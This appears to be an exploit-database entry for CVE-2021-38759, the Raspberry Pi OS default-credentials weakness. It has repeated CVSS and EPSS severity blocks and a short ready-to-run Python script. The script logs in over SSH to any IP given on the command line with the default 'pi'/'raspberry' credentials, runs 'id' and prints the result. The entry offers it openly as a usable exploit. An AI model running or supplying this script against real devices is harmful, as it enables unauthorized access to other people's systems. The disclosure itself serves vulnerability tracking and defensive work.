Netspooky1337DAY-ID-37118Raspberry Pi 5.10 - Default Credentials Vulnerability
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.043 Low
EPSS
Percentile
92.2%
# Exploit Title: Raspberry Pi 5.10 - Default Credentials
# Exploit Author: netspooky
# Vendor Homepage: https://www.raspberrypi.com/
# Software Link: https://www.raspberrypi.com/software/operating-systems/
# Version: Raspberry Pi OS <= 5.10
# Tested on: Raspberry Pi OS 5.10
# CVE : CVE-2021-38759
# Initial Release: https://twitter.com/netspooky/status/1468603668266209280
# Run: $ python3 exploit.py IP
import paramiko
import sys
h=sys.argv[1]
u="pi"
p="raspberry"
c=paramiko.client.SSHClient()
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(h,username=u,password=p)
i,o,e=c.exec_command("id")
print(o.read())
c.close()
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.043 Low
EPSS
Percentile
92.2%